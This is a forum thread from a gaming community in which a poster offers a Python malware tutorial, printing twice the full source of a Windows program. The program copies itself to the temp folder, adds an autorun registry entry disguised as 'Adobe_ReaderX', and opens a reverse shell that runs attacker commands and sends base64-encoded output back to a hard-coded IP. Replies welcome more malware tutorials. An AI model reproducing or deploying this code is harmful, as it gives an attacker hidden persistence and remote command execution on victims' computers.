Post: [Python] Malware thread.
10-11-2015, 11:18 AM #1
Python
Bebe Snek
(adsbygoogle = window.adsbygoogle || []).push({}); This thread will be updated with a new tutorial every 3 days. Now most of the tutorials will be mine and some of them will come from my ebook collection. But I hope you guys enjoy


This tutorial demonstrates some proof of concepts for creating malware using Python and PyInstaller So let's get into it Happy.

One of the most common things you’ll find with malware is it wanting to gain persistence on the victim. There are loads of ways to achieve persistence on Windows, one of the more common being to modify the following registry key: “Software\Microsoft\Windows\CurrentVersion\Run”. Below is a quick screenshot of the Python code to copy the program to the %TEMP% directory and then make a registry modification so this code will execute when a user logs into the computer

    import sys, base64, os, socket, subprocess
from _winreg import *


def autorun(tempdir, fileName, run):
# Copy executable to %TEMP%:
os.system('copy %s %s'%(fileName, tempdir))


# Queries Windows registry for key values
# Appends autorun key to runkey array
key = OpenKey(HKEY_LOCAL_MACHINE, run)
runkey =[]
try:
i = 0
while True:
subkey = EnumValue(key, i)
runkey.append(subkey[0])
i += 1
except WindowsError:
pass


# Set autorun key:
if 'Adobe ReaderX' not in runkey:
try:
key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
key.Close()
except WindowsError:
pass


Now that we have copied this file over to the %TEMP% directory, and setup persistence we can execute the next portion of the code, the reverse shell KryptusGeo.

    def shell():
#Base64 encoded reverse shell
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.1', int(443)))
s.send('[*] Connection Established!'Winky Winky
while 1:
data = s.recv(1024)
if data == "quit": break
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdout_value = proc.stdout.read() + proc.stderr.read()
encoded = base64.b64encode(stdout_value)
s.send(encoded)
#s.send(stdout_value)
s.close()


def main():
tempdir = '%TEMP%'
fileName = sys.argv[0]
run = "Software\Microsoft\Windows\CurrentVersion\Run"
autorun(tempdir, fileName, run)
shell()


if __name__ == "__main__":
main()


Now when this program executes it will open up a reverse shell back to the “attacker” which in this case is a hard coded IP in the script, but it could easily be domain, or maybe something in the Amazon cloud. Below is a quick screen shot demonstrating the program executing on a Windows host and connecting back to the attacker. You can notice the network traffic is base64 encoded:

You must login or register to view this content.

Here is the full code:

    import sys, base64, os, socket, subprocess
from _winreg import *


def autorun(tempdir, fileName, run):
# Copy executable to %TEMP%:
os.system('copy %s %s'%(fileName, tempdir))


# Queries Windows registry for the autorun key value
# Stores the key values in runkey array
key = OpenKey(HKEY_LOCAL_MACHINE, run)
runkey =[]
try:
i = 0
while True:
subkey = EnumValue(key, i)
runkey.append(subkey[0])
i += 1
except WindowsError:
pass


# If the autorun key "Adobe ReaderX" isn't set this will set the key:
if 'Adobe ReaderX' not in runkey:
try:
key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
key.Close()
except WindowsError:
pass


def shell():
#Base64 encoded reverse shell
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.1', int(443)))
s.send('[*] Connection Established!'Winky Winky
while 1:
data = s.recv(1024)
if data == "quit": break
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdout_value = proc.stdout.read() + proc.stderr.read()
encoded = base64.b64encode(stdout_value)
s.send(encoded)
#s.send(stdout_value)
s.close()


def main():
tempdir = '%TEMP%'
fileName = sys.argv[0]
run = "Software\Microsoft\Windows\CurrentVersion\Run"
autorun(tempdir, fileName, run)
shell()


if __name__ == "__main__":
main()


--End of tutorial 1!

Tutorial 2! coming soon Happy
Last edited by Python ; 10-12-2015 at 04:11 AM.

The following 4 users say thank you to Python for this useful post:

Frosty, RTE, Winter
10-11-2015, 07:19 PM #2
Winter
Purple God
NGU used to have a lot of malware tutorials on it's forums, I've noticed that there is barley any compared to what there used to be so it's nice to see someones trying to revive that part, you making two threads?
10-12-2015, 12:16 AM #3
Python
Bebe Snek
Originally posted by Winter View Post
NGU used to have a lot of malware tutorials on it's forums, I've noticed that there is barley any compared to what there used to be so it's nice to see someones trying to revive that part, you making two threads?


Yes. One malware and one Ethical Hacking. They will be the biggest threads that i'm going to try and update every two days with new material

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo